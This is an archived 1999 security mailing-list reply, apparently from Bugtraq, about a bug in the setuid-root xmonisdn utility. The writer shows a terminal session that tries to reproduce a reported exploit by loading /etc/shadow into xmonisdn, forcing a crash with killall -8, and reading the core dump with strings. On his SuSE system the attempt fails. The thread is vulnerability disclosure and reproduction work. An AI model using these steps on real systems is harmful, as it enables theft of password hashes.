Re: xmonisdn (isdn4k-utils/Linux) bug report

From: Jan-Hendrik Terstegge (sysadminat_private)
Date: Wed Oct 20 1999 - 06:40:00 PDT

    On Tue, 19 Oct 1999 Ron wrote:
    > While playing with xmonisdn (included in the isdn4k-utils package),
    > I discovered a little bug. I didn't find anything regarding xmonisdn
    > in the Bugtraq archives, so here's a quick post.
    > I'm wondering if other xmonisdn users can reproduce this exploit.
    > (Tested on my workstation, which is running Red Hat Linux 6.0)
    >[... exploit ...]
    I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it
    seems as if it was an only RedHat Linux exploit.
    This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my
    xmonisdn dies only with an Floating exception but it doesn't dump a core.

    ---snip---
    [pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn
    /usr/bin
    -rwsr-xr-x    1	root	root	15340	Jul 23 01:20 xmonisdn
    [pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow

    [1]  +   Stopped			xmonisdn -file /etc/shadow
    [pts/0@tatooine] /usr/bin > bg
    [1]     xmonisdn -file /etc/shadow &
    [pts/0@tatooine] /usr/bin > killall -8 xmonisdn
    [1]     Floating exception		xmonisdn -file /etc/shadow
    [pts/0@tatooine] /usr/bin > strings core |less
    strings: core: File or Directory not found
    ---snip---

    --
    Jan-Hendrik Terstegge
    <sysadminat_private>